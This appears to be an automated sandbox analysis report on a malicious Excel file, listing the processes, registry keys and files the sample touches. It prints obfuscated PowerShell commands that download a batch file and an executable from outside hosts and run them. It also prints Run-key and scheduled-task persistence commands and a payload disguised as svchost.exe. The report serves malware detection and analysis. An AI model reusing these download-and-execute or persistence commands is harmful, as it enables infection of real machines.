Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>......................................^>..... ./.t. ..........DB.............X.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................r.e.g...........d1......................:_>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................^>.....r.e.g............DB.....................T.......................
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................Y>........J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................). ......................................Y>........J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: .................................................DB.....................*Y>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................`{.J....................J^>......$.J..............B...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................".6...1.". .=.=. .".6...1.". ............Y>.....i.f. ............DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................(................DB.............................................d1......h..v......$........................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.m.d...........................................(................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................X>.....C.m.d............DB.....................t.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................). ..............DB......................Y>......................DB...............$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......$.....`.$.....8.$.....B.......................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.......................(.P.....................$.......R.................................................................2.....
Source: C:\Windows\SysWOW64\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................t...........E.R.R.O.R.:. ...................8...............................................................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................t...........E.R.R.O.(.P.....................8.......................................................j.......x...............

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown	Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:

Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2120349465.0000000002B70000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2139019469.0000000002B80000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2116599990.0000000002AD0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: ps.exe.23.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: GvthaHtVzpRh.exe.24.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.ps.exe.e70000.2.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: svchost.exe.27.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.2.ps.exe.e70000.1.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FF002606FD pushad ; ret
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00E7B93E push es; ret
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_0029887D push esp; retf
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00296AB5 push esp; retf
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_002994C1 push esp; retf
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00297F27 push esp; ret
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00297F58 pushad ; ret
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A721B push ecx; retf
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AF11AA push cs; retf
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00480FEB push eax; mov dword ptr [esp], 00401500h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00480FEB push edx; mov dword ptr [esp], 0040150Eh
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041E390 push eax; mov dword ptr [esp], esi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041E560 push edx; mov dword ptr [esp], ebp
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004019C9 push edx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004019C9 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401D0B push eax; mov dword ptr [esp], esi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push edx; mov dword ptr [esp], 00000064h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push ecx; mov dword ptr [esp], edi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push edi; mov dword ptr [esp], 00000064h
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00E7B93E push es; ret
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_0023B93E push es; ret
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_0020887D push esp; retf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00208158 push esp; ret
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00207A76 push esp; ret
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00206AB5 push esp; retf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_002094C1 push esp; retf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00207EC4 push esp; ret
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C721B push ecx; retf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 35_2_0023B93E push es; ret

Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792
Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792
Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\AppData\Local\Temp\ps.exe

